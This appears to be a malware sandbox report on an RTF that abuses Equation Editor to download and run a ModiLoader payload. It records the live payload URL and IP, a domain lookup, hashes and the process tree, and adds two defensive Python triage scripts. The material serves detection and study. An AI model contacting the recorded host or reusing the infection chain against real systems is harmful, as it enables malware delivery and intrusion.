Analysis
max time kernel: 144s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 23-09-2024 01:37
Static task: static1
Behavioral task: behavioral1
Sample: eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf
Resource: win10v2004-20240802-en
General
Target: eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf
Size: 78KB
MD5: d63c7600ca42fe65af91ae662ef7b637
SHA1: 6f8bba7b9751ed550d0bd7f6f29e7229888ad6f9
SHA256: eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb
SHA512: 83f20a16b336f08d817bc427b39a62a0957ec4bf481b10a320e184c378e227fc2bae513245a18c056fdd34e53f0e6b192f6ca2cb16ad0ca123fdd2938dd58427
SSDEEP: 384:vnHdoOarkwlJbmbKLY17V/W7ZftG5eqVdwRQb65Y2zdfGxswDRa:vnHmOarkwTzs174geqVCFux7a
Malware Config
Signatures
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
ModiLoader Second Stage 60 IoCs
resource | yara_rule
behavioral1/memory/2700-N-0x0000000003680000-0x0000000004680000-memory.dmp | modiloader_stage2
All 60 hits are on memory dumps of PID 2700 (the dropped audiodg.exe) and cover the same 16 MB region 0x0000000003680000-0x0000000004680000; N is the dump index: 20, 29, every index from 30 to 71, then 73, 75, 78, 81, 83, 85, 87, 89, 92, 94, 97, 99, 102, 105, 107 and 109.
Blocklisted process makes network request 1 IoCs
flow | pid | Process
3 | 2660 | EQNEDT32.EXE
Downloads MZ/PE file
Executes dropped EXE 1 IoCs
pid | Process
2700 | audiodg.exe
Loads dropped DLL 5 IoCs
pid | Process
2660 | EQNEDT32.EXE
2660 | EQNEDT32.EXE
1496 | WerFault.exe
1496 | WerFault.exe
1496 | WerFault.exe
Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Program crash 1 IoCs
pid | pid_target | Process | procid_target
1496 | 2700 | WerFault.exe | 30
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EQNEDT32.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | audiodg.exe
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882. Here EQNEDT32.EXE was started through COM activation (the -Embedding switch) to handle the object embedded in the RTF, and the same process went on to make the blocklisted network request and to spawn C:\Users\Admin\AppData\Roaming\audiodg.exe (PID 2660 -> 2700), which a legitimate equation render never does. The report does not identify which Equation Editor bug was triggered.
pid | Process
2660 | EQNEDT32.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
2796 | WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs
pid | Process
2796 | WINWORD.EXE
2796 | WINWORD.EXE
Suspicious use of WriteProcessMemory 12 IoCs
description | pid | Process | procid_target
PID 2660 wrote to memory of 2700 | 2660 | EQNEDT32.EXE | 30 (4 identical entries)
PID 2796 wrote to memory of 2776 | 2796 | WINWORD.EXE | 33 (4 identical entries)
PID 2700 wrote to memory of 1496 | 2700 | audiodg.exe | 34 (4 identical entries)
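The "Launches Equation Editor" signature above fires on runtime behaviour. The same question can be asked of an RTF before it is detonated: decode the hex in its \objdata groups, read the OLE1 object header (version, format id, class name) and look for the Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} in the native data, together with the \objupdate control word that makes Word activate the object on open. The Python script below is an added example, not code from the Triage report or from the ModiLoader authors; it builds its own small test RTF in build_sample_rtf() (it does not embed the analysed sample), and the function names and result keys are this example's own.

```python
"""Static triage of an RTF for an embedded Equation Editor OLE object.

Added example (not code from the sandbox report). The RTF used here is
constructed in build_sample_rtf(); the analysed file itself is not included.
"""
import re
import struct

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046} as stored
# on disk inside OLE structures (Data1..Data3 little-endian, Data4 as-is).
EQUATION_CLSID = bytes.fromhex("02CE020000000000C000000000000046")
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # compound file header

# \objdata is followed by a hex run that Word wraps across many lines.
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
OBJCLASS_RE = re.compile(rb"\\objclass\s+([^\\{}\s]+)")


def extract_objdata(rtf: bytes) -> list:
    """Hex-decode every \\objdata run, ignoring the line wrapping."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdigits = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdigits) % 2:          # defensive: drop a dangling nibble
            hexdigits = hexdigits[:-1]
        blobs.append(bytes.fromhex(hexdigits.decode("ascii")))
    return blobs


def ole1_class_name(blob: bytes):
    """Class name from the OLE1 ObjectHeader at the start of the blob, or None.

    Layout: u32 OLEVersion, u32 FormatID (1 linked / 2 embedded),
            u32 ClassNameLength, ClassName (NUL-terminated ASCII).
    """
    if len(blob) < 12:
        return None
    _version, format_id, name_len = struct.unpack_from("<III", blob, 0)
    if format_id not in (1, 2) or name_len == 0 or name_len > 260:
        return None
    name = blob[12:12 + name_len]
    if len(name) != name_len:
        return None
    return name.rstrip(b"\x00").decode("ascii", "replace")


def scan_rtf(rtf: bytes) -> dict:
    """Collect the indicators a reviewer checks before opening the document."""
    result = {
        "has_object": b"\\object" in rtf,
        "objupdate": b"\\objupdate" in rtf,   # object activates on open
        "objclass": [m.group(1).decode() for m in OBJCLASS_RE.finditer(rtf)],
        "ole1_classes": [],
        "equation_clsid": False,
        "ole2_storage": False,
    }
    for blob in extract_objdata(rtf):
        cls = ole1_class_name(blob)
        if cls:
            result["ole1_classes"].append(cls)
        result["equation_clsid"] |= EQUATION_CLSID in blob
        result["ole2_storage"] |= OLE2_MAGIC in blob
    names = result["objclass"] + result["ole1_classes"]
    result["equation_editor"] = result["equation_clsid"] or any(
        n.lower().startswith("equation") for n in names)
    return result


def build_sample_rtf() -> bytes:
    """Constructed test document (not the real sample): an embedded Equation.3
    object whose native data is a stub OLE2 header followed by the CLSID."""
    native = OLE2_MAGIC + b"\x00" * 8 + EQUATION_CLSID + b"\x00" * 16
    cls = b"Equation.3\x00"
    ole1 = struct.pack("<III", 0x501, 2, len(cls)) + cls
    ole1 += struct.pack("<II", 0, 0)              # topic / item name lengths
    ole1 += struct.pack("<I", len(native)) + native
    hexdata = ole1.hex().encode()
    wrapped = b"\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (b"{\\rtf1\\ansi{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
            b"{\\*\\objdata " + wrapped + b"}}}")


if __name__ == "__main__":
    for key, value in scan_rtf(build_sample_rtf()).items():
        print(f"{key:16} {value}")
```

On a real file, run scan_rtf() over the raw bytes; a document with has_object and objupdate set and an Equation class name or CLSID in the decoded data is the static counterpart of the EQNEDT32.EXE -Embedding launch recorded in this report. The scanner does not follow \bin (binary) object data or the \objclass spelling variants some generators use, so a negative result is weaker than a positive one.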
Processes
1. C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
   Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf"
   PID: 2796
   - Drops file in Windows directory
   - System Location Discovery: System Language Discovery
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\splwow64.exe
      Command line: C:\Windows\splwow64.exe 12288
      PID: 2776
1. C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
   Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
   PID: 2660
   - Blocklisted process makes network request
   - Loads dropped DLL
   - System Location Discovery: System Language Discovery
   - Launches Equation Editor
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Roaming\audiodg.exe
      Command line: "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      PID: 2700
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 748
         PID: 1496
         - Loads dropped DLL
         - Program crash
Network
Remote address: 107.175.243.142:80
Request:
GET /254/audiodg.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 107.175.243.142
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 12 Sep 2024 05:32:53 GMT
ETag: "19d000-621e570328fe3"
Accept-Ranges: bytes
Content-Length: 1691648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/lnk
Remote address: 8.8.8.8:53
Request: maan2u.com IN A
Response: maan2u.com IN A 112.137.173.77
Flow summary (the report does not label the four counters; on the HTTP row 857 small outbound packets against 1260 full-size inbound ones read as bytes sent, bytes received, packets sent, packets received):
42.2kB 1.7MB 857 1260 (HTTP Request: GET http://107.175.243.142/254/audiodg.exe; HTTP Response: 200)
190 B 92 B 4 2
344 B 219 B 5 5
288 B 219 B 5 5
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 20KB
MD5: acec6ef82a478b45a9d699ce4cbb515c
SHA1: 32a804b7f1a8530ffabeb8a8c518f752ea77c657
SHA256: 0b99b09e61f842069b6a665d36c40389d362ed9f368ecb8dd2e2c1b9fef3fed1
SHA512: c77436668bfd27a4eddb857ad0733ab842271047fbbd3d061233ca66d4a17cfd5d0fda19d552dcf725fa54188f8662a0baaca1b3694b45c8ff68c9225da42e33

Filesize: 1.6MB
MD5: d2d166937422f379e6dd15041d83af21
SHA1: 84e0e1e9371b52e6682303fc11b02b69a3df782d
SHA256: c59da5938f667c04ca2ba3639b6cb3d5813fc189d4b2f412613b4bfa36ae0664
SHA512: 3eb977c92a6a541bafd8f5c70d6263c21be019e6124efecb5bd237cbdd24d02eb150f08c9c1bbd3e54a54ef817041a293b03d63d15ec54f18eaa10f888adf8cf
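Read together, the Processes, Network and Downloads sections support a few checks worth automating when triaging reports like this one: EQNEDT32.EXE was started with -Embedding, is the only process that made a network request, and spawned audiodg.exe out of AppData\Roaming; the server answered a .exe URL over plain HTTP with Content-Type application/lnk; and the Apache-style ETag "19d000-621e570328fe3" carries the file size in hex (0x19d000 = 1691648, which is the Content-Length and rounds to the 1.6MB file listed under Downloads). The User-Agent is the stock Internet Explorer/WinINet string for Windows 7 x64, consistent with the loader downloading through WinINet/urlmon rather than a custom HTTP client. The script below is an added example, not code from the Triage report; the process and HTTP records are transcribed by hand from the sections above, and the rule names, the "user-writable path" heuristic and the list of Content-Types accepted for an executable are this example's own assumptions.

```python
"""Cross-check the process tree and HTTP download recorded in this report.

Added example (not code from the sandbox report). PROCS and HTTP are
transcribed from the report; rule names and heuristics are assumptions.
"""
import ntpath
from dataclasses import dataclass
from typing import Optional

SAMPLE = "eb0786d23a2ada26a937a41d56a96514a3df0027ff857d0407d462adfba18ddb.rtf"


@dataclass(frozen=True)
class Proc:
    pid: int
    parent: Optional[int]
    image: str
    cmdline: str
    sigs: tuple = ()


# Transcribed from the Processes section (PIDs, paths and signatures as reported).
PROCS = (
    Proc(2796, None, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n '
         r'"C:\Users\Admin\AppData\Local\Temp\%s"' % SAMPLE),
    Proc(2776, 2796, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    Proc(2660, None, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
         r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding',
         ("Blocklisted process makes network request", "Launches Equation Editor")),
    Proc(2700, 2660, r"C:\Users\Admin\AppData\Roaming\audiodg.exe",
         r'"C:\Users\Admin\AppData\Roaming\audiodg.exe"', ("Executes dropped EXE",)),
    Proc(1496, 2700, r"C:\Windows\SysWOW64\WerFault.exe",
         r"C:\Windows\SysWOW64\WerFault.exe -u -p 2700 -s 748", ("Program crash",)),
)

# Transcribed from the Network section.
HTTP = {
    "url": "http://107.175.243.142/254/audiodg.exe",
    "status": 200,
    "content_length": 1691648,
    "etag": '"19d000-621e570328fe3"',
    "content_type": "application/lnk",
}
DOWNLOADED_SIZE_MB = 1.6   # "Filesize 1.6MB" under Downloads

# Assumption: these are the Content-Types a server would plausibly use for a PE.
EXECUTABLE_TYPES = ("application/x-msdownload", "application/octet-stream",
                    "application/x-dosexec", "application/vnd.microsoft.portable-executable")


def children(pid: int) -> list:
    return [p for p in PROCS if p.parent == pid]


def is_user_writable(path: str) -> bool:
    """Heuristic (assumption): profile AppData or Temp directories are user-writable."""
    low = path.lower()
    return "\\appdata\\" in low or "\\temp\\" in low


def equation_editor_findings() -> list:
    """Flag EQNEDT32.EXE doing anything other than rendering an equation."""
    out = []
    for p in PROCS:
        if ntpath.basename(p.image).upper() != "EQNEDT32.EXE":
            continue
        if "-Embedding" in p.cmdline:
            out.append(f"pid {p.pid}: Equation Editor activated via COM for an embedded object")
        if "Blocklisted process makes network request" in p.sigs:
            out.append(f"pid {p.pid}: Equation Editor made a network request")
        for c in children(p.pid):
            where = "user-writable path" if is_user_writable(c.image) else "system path"
            out.append(f"pid {p.pid} -> {c.pid}: Equation Editor spawned "
                       f"{ntpath.basename(c.image)} from a {where}")
    return out


def apache_etag_size(etag: str) -> int:
    """With Apache's default FileETag (MTime Size) the tag is '<size>-<mtime>' in hex."""
    return int(etag.strip('"').split("-")[0], 16)


def download_findings() -> list:
    """Consistency checks between the HTTP transfer and the dropped file."""
    out = []
    if HTTP["url"].startswith("http://"):
        out.append("payload fetched over plain HTTP")
    if apache_etag_size(HTTP["etag"]) == HTTP["content_length"]:
        out.append(f"ETag size field matches Content-Length ({HTTP['content_length']} bytes)")
    if HTTP["url"].lower().endswith(".exe") and HTTP["content_type"] not in EXECUTABLE_TYPES:
        out.append(f"Content-Type {HTTP['content_type']!r} does not describe the .exe served")
    if round(HTTP["content_length"] / 2 ** 20, 1) == DOWNLOADED_SIZE_MB:
        out.append("dropped-file size matches Content-Length")
    return out


if __name__ == "__main__":
    for line in equation_editor_findings() + download_findings():
        print("-", line)
```

The ETag check is the useful one when the same host serves several payloads: the size field lets you match a captured response to a dropped file without its hash, and a changed mtime field on a later fetch tells you the operator replaced the binary in place.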